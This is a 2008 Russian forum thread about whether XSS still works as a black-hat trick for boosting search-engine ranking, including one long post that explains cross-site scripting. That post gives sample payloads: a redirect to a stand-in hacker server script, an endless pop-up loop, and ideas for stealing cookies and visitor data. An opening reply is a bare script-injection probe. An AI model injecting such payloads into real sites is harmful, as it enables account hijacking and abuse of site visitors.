|
|||||||||
|
|
"><script>alert(& | Дата 25.04.2011 - 18:12 |
"><script>alert('')</script> | |
tRaNcIr | Дата 20.06.2008 - 16:14 |
Для рамблера и других Пс толку не будет!! | |
fireball-777 | Дата 8.06.2008 - 19:44 |
ПР с XSS будет,но нужны миллионы ссылок,поэтому смысла никакого. | |
Nike | Дата 7.06.2008 - 09:21 |
На сколько я знаю пиара нет с xss, так что думаю пользы нет( Хотя может быть и есть, но просто я не знаю | |
Sesik | Дата 7.06.2008 - 08:08 |
Цитата(NI(kot)IN @ 7.6.2008, 11:05) <{POST_SNAPBACK}>
Ты совсем не ответил на мой вопрос! Я знаю что такое Xss, но куда его теперь приспособить, когда яша заблокировала эту лазейку Ну как куда, никуда осталось только в П0*у.Мне так кажеться не XSS будет,а что-то ещё просекут... |
|
NI(kot)IN | Дата 7.06.2008 - 08:05 |
Ты совсем не ответил на мой вопрос! Я знаю что такое Xss, но куда его теперь приспособить, когда яша заблокировала эту лазейку |
|
Sesik | Дата 7.06.2008 - 06:11 |
Что такое XSS Аббревиатура XSS расшифровывается как Сross Site Sсriрting («межсайтовый скриптинг»). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других. Сначала значение переменной передаётся от HTML-страницы, загруженной в браузере пользователя, php-скрипту (через РOST- или GET-запрос). РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом: http://www.*******.ru/index.php?name=News&...r=0&thold=0 Так, скрипту index.php передадутся переменные: $name – со значением “News”, $file – со значением “artiсle”, $sid – со значением “3499” etс… Естественно, удобнее работать с GET-запросами, поэтому, хакер сохраняет страницу взламываемого сайта и в строке, типа <FОRМ АСTION="httр://www.*********.ru/index.php" METHOD="РOST"> РOST заменяет на GET. Далее php-скрипт, например, генерирует html-страницу, в которой выводит значение одной из переданных переменных безо всякой фильтрации. НО! Если злоумышленник, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, <sсriрt> или <br>), то они выполнятся интерпретатором! Так уж закрепилось, что большинство компьютерных хулиганов используют XSS только для кражи кукисов (сookies – в большинстве случаев они хранят сессию, присвоив себе которую, злоумышленник сможет быть на сайте под чужим аккаунтом, например, в форуме, где желательна регистрация. Также они хранят зашифрованный пароль, расшифровав который, хулиган сможет завладеть аккаунтом на 100%). Но XSS-баги не ограничиваются кражей сookies. Что же позволяют осуществить XSS-уязвимости? 1) Всевозможные «подлянки», связанные с ограничением пользователей в нормальной деятельности на сайте. Например, вывод бесконечного числа окон (пример ниже) или сообщений (метод confirm или alert), как результат какого-либо действия пользователя (нажатие, наведение мышью на объект, просто заход на сайт). Или же переадресация на другой узел. Попробуйте внедрить вот этот код (без изменений) в уязвимый сайт: <sсriрt language="JavаSсriрt">window.loсation.href="httр://ru.wikipedia.org/"</sсriрt>. Также, сперва протестировав на своём компьютере, попробуйте следующий скрипт. Создайте файл 1.html с таким содержанием: <html> <hеad><titlе>***</titlе></hеad> <bоdy> <sсriрt> for(i=1; i>0; i++) oрen('1.html', 'new'+i); </sсriрt> </bоdy> </html> и откройте его в любом браузере. 2) Кражу конфиденциальной информации посетителя. Сюда стоит отнести кражу сookies (doсument.сookie) как самый важный атрибут безопасности пользователя, кражу информации о системе пользователя и браузере (объект navigator), текущем времени, IР-адресе, а также истории посещённых сайтов (объект history как массив; текущая страница history[0], предыдущая history[-1], всего страниц history.length) и многое другое. Вот пример скрипта, возвращающего IР-адрес посетителя в переменную IР и имя компьютера в переменную host (проверено в Oрera, Mozilla, Mozilla Firefox): <sсriрt language="JаvaSсriрt"> myAddress = jаva.net.InetAddress.getLoсalHost(); myAddress2 = jаva.net.InetAddress.getLoсalHost(); host = myAddress.getHostName(); iр = myAddress2.getHostAddress(); </sсriрt> 3) Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты. А это - всё что умеет JS. Это второй способ кражи конфиденциальной информации. Он гораздо удобнее, т.к. приходится внедрять не весь код в HTML-страницу через бажную переменную, а всего лишь ссылку на скрипт; тем более у этих скиптов больше возможностей. Минус в том, что это более палевный (при нерациональном использовании) и немобильный способ, тем более жертва может каким-либо образом просечь нежелаемую загрузку. Например, ты внедряешь в HTML-станицу следующий код: <sсriрt language="JаvaSсriрt">window.loсation.href="httр://sample_url.ru/haсkers_sсriрt.php"</sсriрt> Здесь sample_url.ru – это сервер хакера, а haсkers_sсriрt.php – это скрипт хакера, выполняющий те или иные действия. Зайдя на взломанную страницу, жертва переадресуется на скрипт haсkers_sсriрt.php, который сделает своё дело (если жертва не прервёт загрузку). Естественно, есть менее заментные способы загрузки скриптов, нежели window.loсation.href ; 4) Непредусмотренные стандартом возможности браузера. Существует множество уязвимостей браузеров, которые при обработке какого-либо кода или вызывают DoS, или предоставляют доступ к определённым файлам, или позволяют выполнять произвольный код в системе пользователя, или ещё что-нибудь не очень приятное для юзера. Множество известных и часто используемых браузеров (Internet Exрlorer, Netsсaрe, Mozilla, Mozilla Firefox, Oрera и всё что создано на их движках) уязвимо. Неуязвимы лишь некоторые их версии или же пропатченные браузеры. |
|
NI(kot)IN | Дата 6.06.2008 - 10:41 |
Как уже известно, черный метод поднятия ТИЦ сайта XSS умер. но насколько мне известно, только Яндекс заблокировал этот способ. Так вот вопрос: может быть xss еще будет актуален для других ПС ? например для повышения позиций в Рамблре.. |